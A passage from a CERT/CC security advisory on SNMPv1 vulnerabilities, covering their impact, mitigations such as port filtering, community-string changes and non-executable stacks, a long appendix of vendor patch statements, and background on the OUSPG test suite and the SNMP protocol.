vulnerabilities have been assigned the CVE identifiers CAN-2002-0012 and CAN-2002-0013, respectively. II. Impact These vulnerabilities may cause denial-of-service conditions, service interruptions, and in some cases may allow an attacker to gain access to the affected device. Specific impacts will vary from product to product. III. Solution Note that many of the mitigation steps recommended below may have significant impact on your everyday network operations and/or network architecture. Ensure that any changes made based on the following recommendations will not unacceptably affect your ongoing network operations capability. Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. Please consult this appendix to determine if you need to contact your vendor directly. Disable the SNMP service As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required, including SNMP. Unfortunately, some of the affected products exhibited unexpected behavior or denial of service conditions when exposed to the OUSPG test suite even if SNMP was not enabled. In these cases, disabling SNMP should be used in conjunction with the filtering practices listed below to provide additional protection. Ingress filtering As a temporary measure, it may be possible to limit the scope of these vulnerabilities by blocking access to SNMP services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. For SNMP, ingress filtering of the following ports can prevent attackers outside of your network from impacting vulnerable devices in the local network that are not explicitly authorized to provide public SNMP services. snmp 161/udp # Simple Network Management Protocol (SNMP) snmp 162/udp # SNMP system management messages The following services are less common, but may be used on some affected products snmp 161/tcp # Simple Network Management Protocol (SNMP) snmp 162/tcp # SNMP system management messages smux 199/tcp # SNMP Unix Multiplexer smux 199/udp # SNMP Unix Multiplexer synoptics-relay 391/tcp # SynOptics SNMP Relay Port synoptics-relay 391/udp # SynOptics SNMP Relay Port agentx 705/tcp # AgentX snmp-tcp-port 1993/tcp # cisco SNMP TCP port snmp-tcp-port 1993/udp # cisco SNMP TCP port As noted above, you should carefully consider the impact of blocking services that you may be using. It is important to note that in many SNMP implementations, the SNMP daemon may bind to all IP interfaces on the device. This has important consequences when considering appropriate packet filtering measures required to protect an SNMP-enabled device. For example, even if a device disallows SNMP packets directed to the IP addresses of its normal network interfaces, it may still be possible to exploit these vulnerabilities on that device through the use of packets directed at the following IP addresses: * "all-ones" broadcast address * subnet broadcast address * any internal loopback addresses (commonly used in routers for management purposes, not to be confused with the IP stack loopback address 127.0.0.1) Careful consideration should be given to addresses of the types mentioned above by sites planning for packet filtering as part of their mitigation strategy for these vulnerabilities. Finally, sites may wish to block access to the following RPC services related to SNMP (listed as name, program ID, alternate names) snmp 100122 na.snmp snmp-cmc snmp-synoptics snmp-unisys snmp-utk snmpv2 100138 na.snmpv2 # SNM Version 2.2.2 snmpXdmid 100249 Please note that this workaround may not protect vulnerable devices from internal attacks. Filter SNMP traffic from non-authorized internal hosts In many networks, only a limited number of network management systems need to originate SNMP request messages. Therefore, it may be possible to configure the SNMP agent systems (or the network devices in between the management and agent systems) to disallow request messages from non-authorized systems. This can reduce, but not wholly eliminate, the risk from internal attacks. However, it may have detrimental effects on network performance due to the increased load imposed by the filtering, so careful consideration is required before implementation. Similar caveats to the previous workaround regarding broadcast and loopback addresses apply. Change default community strings Most SNMP-enabled products ship with default community strings of "public" for read-only access and "private" for read-write access. As with any known default access control mechanism, the CERT/CC recommends that network administrators change these community strings to something of their own choosing. However, even when community strings are changed from their defaults, they will still be passed in plaintext and are therefore subject to packet sniffing attacks. SNMPv3 offers additional capabilities to ensure authentication and privacy as described in RFC2574. Because many of the vulnerabilities identified in this advisory occur before the community strings are evaluated, it is important to note that performing this step alone is not sufficient to mitigate the impact of these vulnerabilities. Nonetheless, it should be performed as part of good security practice. Segregate SNMP traffic onto a separate management network In situations where blocking or disabling SNMP is not possible, exposure to these vulnerabilities may be limited by restricting all SNMP access to separate, isolated management networks that are not publicly accessible. Although this would ideally involve physically separate networks, that kind of separation is probably not feasible in most environments. Mechanisms such as virtual LANs (VLANs) may be used to help segregate traffic on the same physical network. Note that VLANs may not strictly prevent an attacker from exploiting these vulnerabilities, but they may make it more difficult to initiate the attacks. Another option is for sites to restrict SNMP traffic to separate virtual private networks (VPNs), which employ cryptographically strong authentication. Note that these solutions may require extensive changes to a site's network architecture. Egress filtering Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound traffic to the Internet. In the case of SNMP vulnerabilities, employing egress filtering on the ports listed above at your network border can prevent your network from being used as a source for attacks on other sites. Disable stack execution Disabling executable stacks (on systems where this is configurable) can reduce the risk of "stack smashing" attacks based on these vulnerabilities. Although this does not provide 100 percent protection against exploitation of these vulnerabilities, it makes the likelihood of a successful exploit much smaller. On many UNIX systems, executable stacks can be disabled by adding the following lines to /etc/system: set noexec_user_stack = 1 set noexec_user_stack_log = 1 Note that this may go against the SPARC and Intel ABIs and can be bypassed as required in programs with mprotect(2). For the changes to take effect you will then need to reboot. Other operating systems and architectures also support the disabling of executable stacks either through native configuration parameters or via third-party software. Consult your vendor(s) for additional information. Share tools and techniques Because dealing with these vulnerabilities to systems and networks is so complex, the CERT/CC will provide a forum where administrators can share ideas and techniques that can be used to develop proper defenses. We have created an unmoderated mailing list for system and network administrators to discuss helpful techniques and tools. You can subscribe to the mailing list by sending an email message to majordomo@cert.org. In the body of the message, type subscribe snmp-forum After you receive the confirmation message, follow the instructions in the message to complete the subscription process. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. AdventNet This is in reference to your notification regarding [VU#107186 and VU#854306] and OUSPG#0100. AdventNet Inc. has reproduced this behavior in their products and coded a Service Pack fix which is currently in regression testing in AdventNet Inc.'s Q.A. organization. The release of AdventNet Inc's. Service Pack correcting the behavior outlined in VU#617947, and OUSPG#0100 is scheduled to be generally available to all of AdventNet Inc.'s customers by February 20, 2002. Avaya Avaya Inc. acknowledges the potential of SNMP vulnerabilities and is currently investigating whether these vulnerabilities impact Avaya's products or solutions. No further information is available at this time. CacheFlow The purpose of this email is to advise you that CacheFlow Inc. has provided a software update. Please be advised that updated versions of the software are now available for all supported CacheFlow hardware platforms, and may be obtained by CacheFlow customers at the following URL: http://download.cacheflow.com/ The specific reference to the software update is contained within the Release Notes for CacheOS Versions 3.1.22 Release ID 17146, 4.0.15 Release ID 17148, 4.1.02 Release ID 17144 and 4.0.15 Release ID 17149. RELEASE NOTES FOR CACHEFLOW SERVER ACCELERATOR PRODUCTS: * http://download.cacheflow.com/release/SA/4.0.15/relnotes.htm RELEASE NOTES FOR CACHEFLOW CONTENT ACCELERATOR PRODUCTS: * http://download.cacheflow.com/release/CA/3.1.22/relnotes.htm * http://download.cacheflow.com/release/CA/4.0.15/relnotes.htm * http://download.cacheflow.com/release/CA/4.1.02/relnotes.htm * SR 1-1647517, VI 13045: This update modified a potential vulnerability by using an SNMP test tools exploit. 3Com Corporation A vulnerability to an SNMP packet with an invalid length community string has been resolved in the following products. Customers concerned about this weakness should ensure that they upgrade to the following agent versions: PS Hub 40 2.16 is due Feb 2002 PS Hub 50 2.16 is due Feb 2002 Dual Speed Hub 2.16 is due Jan 2002 Switch 1100/3300 2.68 is available now Switch 4400 2.02 is available now Switch 4900 2.04 is available now WebCache1000/3000 2.00 is due Jan 2002 Caldera Caldera International, Inc. has reproduced faulty behavior in Caldera SCO OpenServer 5, Caldera UnixWare 7, and Caldera Open UNIX 8. We have coded a software fix for supported versions of Caldera UnixWare 7 and Caldera Open UNIX 8 that will be available from our support site at http://stage.caldera.com/support/security immediately following the publication of this CERT announcement. A fix for supported versions of OpenServer 5 will be available at a later date. Cisco Systems Cisco Systems is addressing the vulnerabilities identified by VU#854306 and VU#107186 across its entire product line. Cisco will publish a security advisory with further details at http://www.cisco.com/go/psirt/. Compaq Computer Corporation x-ref: SSRT0779U SNMP At the time of writing this document, COMPAQ continues to evaluate this potential problem and when new versions of SNMP are available, COMPAQ will implement solutions based on the new code. Compaq will provide notice of any new patches as a result of that effort through standard patch notification procedures and be available from your normal Compaq Services support channel. Computer Associates Computer Associates has confirmed Unicenter vulnerability to the SNMP advisory identified by CERT notification reference [VU#107186 & VU#854306] and OUSPG#0100. We have produced corrective maintenance to address these vulnerabilities, which is in the process of publication for all applicable releases / platforms and will be offered through the CA Support site. Please contact our Technical Support organization for information regarding availability / applicability for your specific configuration(s). COMTEK Services, Inc. NMServer for AS/400 is not an SNMP master and is therefore not vulnerable. However this product requires the use of the AS/400 SNMP master agent supplied by IBM. Please refer to IBM for statements of vulnerabilities for the AS/400 SNMP master agent. NMServer for OpenVMS has been tested and has shown to be vulnerable. COMTEK Services is preparing a new release of this product (version 3.5) which will contain a fix for this problem. This new release is scheduled to be available in February 2002. Contact COMTEK Services for further information. NMServer for VOS has not as yet been tested; vulnerability of this agent is unknown. Contact for further information on the testing schedule of the VOS product. Covalent Technologies Covalent Technologies ERS (Enterprise Ready Server), Secure Server, and Conductor SNMP module are not vulnerable according to testing performed in accordance with CERT recommendations. Security information for Covalent products can be found at www.covalent.net Dartware, LLC Dartware, LLC (www.dartware.com) supplies two products that use SNMPv1 in a manager role, InterMapper and SNMP Watcher. These products are not vulnerable to the SNMP vulnerability described in [VU#854306 and VU#107186]. This statement applies to all present and past versions of these two software packages. DMH Software DMH Software is in the process of evaluating and attempting to reproduce this behavior. It is unclear at this point if our snmp-agent is sensitive to the tests described above. If any problems will be discovered, DMH Software will code a software fix. The release of DMH Software OS correcting the behavior outlined in VU#854306, VU#107186, and OUSPG#0100 will be generally available to all of DMH Software's customers as soon as possible. EnGarde Secure Linux EnGarde Secure Linux did not ship any SNMP packages in version 1.0.1 of our distribution, so we are not vulnerable to either bug. FreeBSD FreeBSD does not include any SNMP software by default, and so is not vulnerable. However, the FreeBSD Ports Collection contains the UCD-SNMP / NET-SNMP package. Package versions prior to ucd-snmp-4.2.3 are vulnerable. The upcoming FreeBSD 4.5 release will ship the corrected version of the UCD-SNMP / NET-SNMP package. In addition, the corrected version of the packages is available from the FreeBSD mirrors. FreeBSD has issued the following FreeBSD Security Advisory regarding the UCD-SNMP / NET-SNMP package: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:09. snmp.asc. Hewlett-Packard Company SUMMARY - known vulnerable: ======================================== hp procurve switch 2524 NNM (Network Node Manager) JetDirect Firmware (Older versions only) HP-UX Systems running snmpd or OPENVIEW MC/ServiceGuard EMS Still under investigation: SNMP/iX (MPE/iX) ======================================== _________________________________________________________ --------------------------------------------------------- hp procurve switch 2524 --------------------------------------------------------- hp procurve switch 2525 (product J4813A) is vulnerable to some issues, patches in process. Watch for the associated HP Security Bulletin. --------------------------------------------------------- NNM (Network Node Manager) --------------------------------------------------------- Some problems were found in NNM product were related to trap handling. Patches in process. Watch for the associated HP Security Bulletin. --------------------------------------------------------- JetDirect Firmware (Older versions only) --------------------------------------------------------- ONLY some older versions of JetDirect Firmware are vulnerable to some of the issues. The older firmware can be upgraded in most cases, see list below. JetDirect Firmware Version State ========================== ===== X.08.32 and higher NOT Vulnerable X.21.00 and higher NOT Vulnerable JetDirect Product Numbers that can be freely upgraded to X.08.32 or X.21.00 or higher firmware. EIO (Peripherals Laserjet 4000, 5000, 8000, etc...) J3110A 10T J3111A 10T/10B2/LocalTalk J3112A Token Ring (discontinued) J3113A 10/100 (discontinued) J4169A 10/100 J4167A Token Ring MIO (Peripherals LaserJet 4, 4si, 5si, etc...) J2550A/B 10T (discontinued) J2552A/B 10T/10Base2/LocalTalk (discontinued) J2555A/B Token Ring (discontinued) J4100A 10/100 J4105A Token Ring J4106A 10T External Print Servers J2591A EX+ (discontinued) J2593A EX+3 10T/10B2 (discontinued) J2594A EX+3 Token Ring (discontinued) J3263A 300X 10/100 J3264A 500X Token Ring J3265A 500X 10/100 ---------------------------------------------------------- HP-UX Systems running snmpd or OPENVIEW ---------------------------------------------------------- The following patches are available now: PHSS_26137 s700_800 10.20 OV EMANATE14.2 Agent Consolidated Patch PHSS_26138 s700_800 11.X OV EMANATE14.2 Agent Consolidated Patch PSOV_03087 EMANATE Release 14.2 Solaris 2.X Agent Consolidated Patch All three patches are available from: http://support.openview.hp.com/cpe/patches/ In addition PHSS_26137 and PHSS_26138 will soon be available from: http://itrc.hp.com ================================================================ NOTE: The patches are labeled OV(Open View). However, the patches are also applicable to systems that are not running Open View. ================================================================= Any HP-UX 10.X or 11.X system running snmpd or snmpdm is vulnerable. To determine if your HP-UX system has snmpd or snmpdm installed: swlist -l file | grep snmpd If a patch is not available for your platform or you cannot install an available patch, snmpd and snmpdm can be disabled by removing their entries from /etc/services and removing the execute permissions from /usr/sbin/snmpd and /usr/sbin/snmpdm. ---------------------------------------------------------------- Investigation completed, systems vulnerable. ---------------------------------------------------------------- MC/ServiceGuard Event Monitoring System (EMS) ---------------------------------------------------------------- Still under investigation: ---------------------------------------------------------------- SNMP/iX (MPE/iX) Hirschmann Electronics GmbH & Co. KG Hirschmann Electronics GmbH & Co. KG supplies a broad range of networking products, some of which are affected by the SNMP vulnerabilities identified by CERT Coordination Center. The manner in which they are affected and the actions required to avoid being impacted by exploitation of these vulnerabilities, vary from product to product. Hirschmann customers may contact our Competence Center (phone +49-7127-14-1538, email: ans-support@nt.hirschmann.de) for additional information, especially regarding availability of latest firmware releases addressing the SNMP vulnerabilities. IBM Corporation Based upon the results of running the test suites we have determined that our version of SNMP shipped with AIX is NOT vulnerable. Innerdive Solutions, LLC Innerdive Solutions, LLC has two SNMP based products: 1. The "SNMP MIB Scout" (http://www.innerdive.com/products/mibscout/) 2. The "Router IP Console" (http://www.innerdive.com/products/ric/) The "SNMP MIB Scout" is not vulnerable to either bug. The "Router IP Console" releases prior to 3.3.0.407 are vulnerable. The release of "Router IP Console" correcting the behavior outlined in OUSPG#0100 is 3.3.0.407 and is already available on our site. Also, we will notify all our customers about this new release no later than March 5, 2002. Juniper Networks This is in reference to your notification regarding CAN-2002-0012 and CAN-2002-0013. Juniper Networks has reproduced this behavior and coded a software fix. The fix will be included in all releases of JUNOS Internet software built after January 5, 2002. Customers with current support contracts can download new software with the fix from Juniper's web site at www.juniper.net. Note: The behavior described in CAN-2002-0012 and CAN-2002-0013 can only be reproduced in JUNOS Internet software if certain tracing options are enabled. These options are generally not enabled in production routers. Lantronix, Inc. Lantronix is committed to resolving security issues with our products. The SNMP security bug you reported has been fixed in LRS firmware version B1.3/611(020123). Lotus Development Corporation Lotus Software evaluated the Lotus Domino Server for vulnerabilities using the test suite materials provided by OUSPG. This problem does not affect default installations of the Domino Server. However, SNMP agents can be installed from the CD to provide SNMP services for the Domino Server (these are located in the /apps/sysmgmt/agents directory). The optional platform specific master and encapsulator agents included with the Lotus Domino SNMP Agents for HP-UX and Solaris have been found to be vulnerable. For those platforms, customers should upgrade to version R5.0.1 a of the Lotus Domino SNMP Agents, available for download from the Lotus Knowledge Base on the IBM Support Web Site (http://www.ibm.com/software/lotus/support/). Please refer to Document #191059, "Lotus Domino SNMP Agents R5.0.1a", also in the Lotus Knowledge Base, for more details. LOGEC Systems Inc The products from LOGEC Systems are exposed to SNMP only via HP OpenView. We do not have an implementation of SNMP ourselves. As such, there is nothing in our products that would be an issue with this alert. Lucent Lucent is aware of reports that there is a vulnerability in certain implementations of the SNMP (Simple Network Management Protocol) code that is used in data switches and other hardware throughout the telecom industry. As soon as we were notified by CERT, we began assessing our product portfolio and notifying customers with products that might be affected. Our 5ESS switch and most of our optical portfolio were not affected. Our core and edge ATM switches and most of our edge access products are affected, but we have developed, tested, and deployed fixes for many of those products to our customers. Fixes for the rest of the affected product portfolio will be available shortly. We consider the security and reliability of our customers' networks to be one of our critical measures of success. We take every reasonable measure to ensure their satisfaction. In addition, we are working with customers on ways to further enhance the security they have in place today. Marconi Marconi supplies a broad range of telecommunications and related products, some of which are affected by the SNMP vulnerabilities identified here. The manner in which they are affected and the actions required (if any) to avoid being impacted by exploitation of these vulnerabilities, vary from product to product. Those Marconi customers with support entitlement may contact the appropriate Technical Assistance Center (TAC) for additional information. Those not under support entitlement may contact their sales representative. Microsoft Corporation The Microsoft Security Reponse [sic] Center has investigated this issue, and provides the following information. Summary: All Microsoft implementations of SNMP v1 are affected by the vulnerability. The SNMP v1 service is not installed or running by default on any version of Windows. A patch is underway to eliminate the vulnerability. In the meantime, we recommend that affected customers disable the SNMP v1 service. Details: An SNMP v1 service ships on the CDs for Windows 95, 98, and 98SE. It is not installed or running by default on any of these platforms. An SNMP v1 is NOT provided for Windows ME. However, it is possible that Windows 98 machines which had the service installed and were upgraded would still have the service. Since SNMP is not supported for WinME, customers in this situation are urged to remove the SNMP service. An SNMP v1 service is available on Windows NT 4.0 (including Terminal Server Edition) and Windows 2000 but is not installed or running by default on any of these platforms.Windows XP does not ship with an SNMP v1 service. Remediation: A patch is underway for the affected platforms, and will be released shortly. In the meantime, Microsoft recommends that customers who have the SNMP v1 service running disable it to protect their systems. Following are instruction for doing this: Windows 95, 98 and 98SE: 1. In Control Panel, double-click Network. 2. On the Configuration tab, select Microsoft SNMP Agent from the list of installed components. 3. Click Remove Check the following keys and confirm that snmp.exe is not listed. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSer vices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run For Windows XP: 1. Right-click on My Computer and select Manage 2. Click on Services and Applications, then on Services 3. Location SNMP on the list of services, then select it and click Stop. 4. Select Startup, and click Disabled. 5. Click OK to close the dialoge [sic], then close the Computer Management window. For Windows NT 4.0 (including Terminal Server Edition): 1. Select Start, then Settings. 2. Select Control Panel, then click on the Services Icon 3. Locate SNMP on the list of services, then select it and click Stop. 4. Select Startup, and click Disabled. 5. Click OK to close the dialoge [sic], then close Control Panel Windows 2000: 1. Right-click on My Computer and select Manage 2. Click on Services and Applications, then on Services 3. Location SNMP on the list of services, then select it and click Stop. 4. Select Startup, and click Disabled. 5. Click OK to close the dialoge [sic], then close the Computer Management window. Multinet MultiNet and TCPware customers should contact Process Software to check for the availability of patches for this issue. A couple of minor problems were found and fixed, but there is no security risk related to the SNMP code included with either product. Netaphor NETAPHOR SOFTWARE INC. is the creator of Cyberons for Java -- SNMP Manager Toolkit and Cyberons for Java -- NMS Application Toolkit, two Java based products that may be affected by the SNMP vulnerabilities identified here. The manner in which they are affected and the actions required (if any) to avoid being impacted by exploitation of these vulnerabilities, may be obtained by contacting Netaphor via email at info@netaphor.com Customers with annual support may contact support@netaphor.com directly. Those not under support entitlement may contact Netaphor sales: sales@netaphor.com or (949) 470 7955 in USA. NetBSD NetBSD does not ship with any SNMP tools in our 'base' releases. We do provide optional packages which provide various support for SNMP. These packages are not installed by default, nor are they currently provided as an install option by the operating system installation tools. A system administrator/end-user has to manually install this with our package management tools. These SNMP packages include: + netsaint-plugin-snmp-1.2.8.4 (SNMP monitoring plug-in for netsaint) + p5-Net-SNMP-3.60 (perl5 module for SNMP queries) + p5-SNMP-3.1.0 (Perl5 module for interfacing to the UCD SNMP library + p5-SNMP_Session-0.83 (perl5 module providing rudimentary access to remote SNMP agents) + ucd-snmp-4.2.1 (Extensible SNMP implementation) (conflicts with ucd-snmp-4.1.2) + ucd-snmp-4.1.2 (Extensible SNMP implementation) (conflicts with ucd-snmp-4.2.1) We do provide a software monitoring mechanism called 'audit-packages', which allows us to highlight if a package with a range of versions has a potential vulnerability, and recommends that the end-user upgrade the packages in question. Netscape Communications Corporation Netscape continues to be committed to maintaining a high level of quality in our software and service offerings. Part of this commitment includes prompt response to security issues discovered by organizations such as the CERT Coordination Center. According to a recent CERT/CC advisory, The Oulu University Secure Programming Group (OUSPG) has reported numerous vulnerabilities in multiple vendor SNMPv1 implementations. These vulnerabilities may allow unauthorized privileged access, denial of service attacks, or unstable behavior. We have carefully examined the reported findings, performing the tests suggested by the OUSPG to determine whether Netscape server products were subject to these vulnerabilities. It was determined that several products fell into this category. As a result, we have created fixes which will resolve the issues, and these fixes will appear in future releases of our product line. To Netscape's knowledge, there are no known instances of these vulnerabilities being exploited and no customers have been affected to date. When such security warnings are issued, Netscape has committed to - and will continue to commit to - resolving these issues in a prompt and timely fashion, ensuring that our customers receive products of the highest quality and security. NET-SNMP All ucd-snmp version prior to 4.2.2 are susceptible to this vulnerability and users of versions prior to version 4.2.2 are encouraged to upgrade their software as soon as possible (http://www.net-snmp.org/download/). Version 4.2.2 and higher are not susceptible. Network Associates PGP is not affected, impacted, or otherwise related to this VU#. Network Computing Technologies Network Computing Technologies has reviewed the information regarding SNMP vulnerabilities and is currently investigating the impact to our products. Nokia This vulnerability is known to affect IPSO versions 3.1.3, 3.3, 3.3.1, 3.4, and 3.4.1. Patches are currently available for versions 3.3, 3.3.1, 3.4 and 3.4.1 for download from the Nokia website. In addition, version 3.4.2 shipped with the patch incorporated, and the necessary fix will be included in all future releases of IPSO. We recommend customers install the patch immediately or follow the recommended precautions below to avoid any potential exploit. If you are not using SNMP services, including Traps, simply disable the SNMP daemon to completely eliminate the potential vulnerability. If you are using only SNMP Traps and running Check Point FireWall-1, create a firewall policy to disallow incoming SNMP messages on all appropriate interfaces. Traps will continue to work normally. Nortel Networks The CERT Coordination Center has issued a broad based alert to the technology industry, including Nortel Networks, regarding potential security vulnerabilities identified in the Simple Network Management Protocol (SNMP), a common networking standard. The company is working with CERT and other network equipment manufacturers, the U.S. Government, service providers, and software suppliers to assess and address this issue. Novell Novell ships SNMP.NLM and SNMPLOG.NLM with NetWare 4.x, NetWare 5.x and 6.0 systems. The SNMP and SNMPLOG vulnerabilities detected on NetWare are fixed and will be available through NetWare 6 Support Pack 1 & NetWare 5.1 Support Pack 4. Support packs are available at http://support.novell.com/tools/csp/ OpenBSD OpenBSD does not ship SNMP code. Qualcomm WorldMail does not support SNMP by default, so customers who run unmodified installations are not vulnerable. Redback Networks, Inc. Redback Networks, Inc. has identified that the vulnerability in question affects certain versions of AOS software on the SMS 500, SMS 1800, and SMS 10000 platforms, and is taking the appropriate steps necessary to correct the issue. Red Hat RedHat has released a security advisiory [sic] at http://www.redhat.com/support/errata/RHSA-2001-163.html with updated versions of the ucd-snmp package for all supported releases and architectures. For more information or to download the update please visit this page. SGI SGI acknowledges the SNMP vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on http://www.sgi.com/support/security/. SNMP Research International SNMP Research has made the following vendor statement. They are likely to revise and expand the statement as the date for the public vulnerability announcement draws nearer. The most recent releases (15.3.1.7 and above) of all SNMP Research products address the vulnerabilities identified in the following CERT vulnerability advisories: VU#854306 (Multiple vulnerabilities in SNMPv1 request handling) VU#107186 (Multiple vulnerabilities in SNMPv1 trap handling) All customers who maintain a support contract have received either this release or appropriate patch sets to their 15.3 source code releases addressing these vulnerabilities. Users maintaining earlier releases should update to the current release if they have not already done so. Up-to-date information is available from support@snmp.com. Stonesoft Stonesoft's StoneGate product does not include an SNMP agent, and is therefore not vulnerable to this. Other Stonesoft's products are still under investigation. As further information becomes available, additional advisories will be available at http://www.stonesoft.com/support/techcenter/ Sun Microsystems, Inc. Sun's SNMP product, Solstice Enterprise Agents (SEA), described here: http://www.sun.com/solstice/products/ent.agents/ is affected by VU#854306 but not VU#107186. More specifically the main agent of SEA, snmpdx(1M), is affected on Solaris 2.6, 7, 8. Sun is currently generating patches for this issue and will be releasing a Sun Security Bulletin once the patches are available. The bulletin will be available from: http://sunsolve.sun.com/security. Sun patches are available from: http://sunsolve.sun.com/securitypatch. Symantec Corporation Symantec Corporation has investigated the SNMP issues identified by the OUSPG test suite and determined that Symantec products are not susceptable [sic] to these issues. TANDBERG Tandberg have run all the testcases found the PROTOS test-suie [sic], c06snmpv1: 1. c06-snmpv1-trap-enc-pr1.jar 2. c06-snmpv1-treq-app-pr1.jar 3. c06-snmpv1-trap-enc-pr1.jar 4. c06-snmpv1-req-app-pr1.jar The tests were run with standard delay time between the requests (100ms), but also with a delay of 1ms. The tests applies to all TANDBERG products (T500, T880, T1000, T2500, T6000 and T8000). The software tested on these products were B4.0 (our latest software) and no problems were found when running the test suite. Tivoli Systems Our analysis indicates that this vulnerability does not affect the Tivoli NetView product. Appendix B. - References 1. http://www.ee.oulu.fi/research/ouspg/protos/ 2. http://www.kb.cert.org/vuls/id/854306 3. http://www.kb.cert.org/vuls/id/107186 4. http://www.cert.org/tech_tips/denial_of_service.html 5. http://www.ietf.org/rfc/rfc1067.txt 6. http://www.ietf.org/rfc/rfc1089.txt 7. http://www.ietf.org/rfc/rfc1140.txt 8. http://www.ietf.org/rfc/rfc1155.txt 9. http://www.ietf.org/rfc/rfc1156.txt 10. http://www.ietf.org/rfc/rfc1215.txt 11. http://www.ietf.org/rfc/rfc1270.txt 12. http://www.ietf.org/rfc/rfc1352.txt Appendix C. - Background Information Background Information on the OUSPG OUSPG is an academic research group located at Oulu University in Finland. The purpose of this research group is to test software for vulnerabilities. History has shown that the techniques used by the OUSPG have discovered a large number of previously undetected problems in the products and protocols they have tested. In 2001, the OUSPG produced a comprehensive test suite for evaluating implementations of the Lightweight Directory Access Protocol (LDAP). This test suite was developed with the strategy of abusing the protocol in unsupported and unexpected ways, and it was very effective in uncovering a wide variety of vulnerabilities across several products. This approach can reveal vulnerabilities that would not manifest themselves under normal conditions. After completing its work on LDAP, OUSPG moved its focus to SNMPv1. As with LDAP, they designed a custom test suite, began testing a selection of products, and found a number of vulnerabilities. Because OUSPG's work on LDAP was similar in procedure to its current work on SNMP, you may wish to review the LDAP Test Suite and CERT Advisory CA-2001-18, which outlined results of application of the test suite. In order to test the security of protocols like SNMPv1, the PROTOS project presents a server with a wide variety of sample packets containing unexpected values or illegally formatted data. As a member of the PROTOS project consortium, the OUSPG used the PROTOS c06-snmpv1 test suite to study several implementations of the SNMPv1 protocol. Results of the test suites run against SNMP indicate that there are many different vulnerabilities on many different implementations of SNMP. Background Information on the Simple Network Management Protocol The Simple Network Management Protocol (SNMP) is the most popular protocol in use to manage networked devices. SNMP was designed in the late 80's to facilitate the exchange of management information between networked devices, operating at the application layer of the ISO/OSI model. The SNMP protocol enables network and system administrators to remotely monitor and configure devices on the network (devices such as switches and routers). Software and firmware products designed for networks often make use of the SNMP protocol. SNMP runs on a multitude of devices and operating systems, including, but not limited to, + Core Network Devices (Routers, Switches, Hubs, Bridges, and Wireless Network Access Points) + Operating Systems + Consumer Broadband Network Devices (Cable Modems and DSL Modems) + Consumer Electronic Devices (Cameras and Image Scanners) + Networked Office Equipment (Printers, Copiers, and FAX Machines) + Network and Systems Management/Diagnostic Frameworks (Network Sniffers and Network Analyzers) + Uninterruptible Power Supplies (UPS) + Networked Medical Equipment (Imaging Units and Oscilloscopes) + Manufacturing and Processing Equipment The SNMP protocol is formally defined in RFC1157. Quoting from that RFC: Implicit in the SNMP architectural model is a collection of network management stations and network elements. Network management stations execute management applications which monitor and control network elements. Network elements are devices such as hosts, gateways, terminal servers, and the like, which have management agents responsible for performing the network management functions requested by the network management stations. The Simple Network Management Protocol (SNMP) is used to communicate management information between the network management stations and the agents in the network elements. Additionally, SNMP is discussed in a number of other RFC documents: + RFC 3000 Internet Official Protocol Standards + RFC 1212 Concise MIB Definitions + RFC 1213 Management Information Base for Network Management of TCP/IP-based Internets: MIB-II + RFC 1215 A Convention for Defining Traps for use with the SNMP + RFC 1270 SNMP Communications Services + RFC 2570 Introduction to Version 3 of the Internet-standard Network Management Framework + RFC 2571 An Architecture for Describing SNMP Management Frameworks + RFC 2572 Message Processing and Dispatching for the Simple Network Management Protocol (SNMP) + RFC 2573 SNMP Applications + RFC 2574 User-based Security Model (USM) for version 3 of the Simple Network Management Protocol (SNMPv3) + RFC 2575 View-based Access Control Model (VACM) for the Simple Network Management Protocol (SNMP) + RFC 2576 Coexistence between Version 1, Version 2, and Version 3 of the Internet-standard Network Management Framework _____________________________________________________________ The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for providing detailed technical analyses, and for assisting us in preparing this advisory. We also thank Steven M. Bellovin (AT&T Labs -- Research), Wes Hardaker (Net-SNMP), Steve Moulton (SNMP Research), Tom Reddington (Bell Labs), Mike Duckett (Bell South), Rob Thomas, Blue Boar (Thievco), and the many others who contributed to this document. _____________________________________________________________ Feedback on this document can be directed to the authors, Ian A. Finlay, Shawn V. Hernan, Jason A. Rafail, Chad Dougherty, Allen D. Householder, Marty Lindner, and Art Manion. __________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-03.html __________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. __________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or 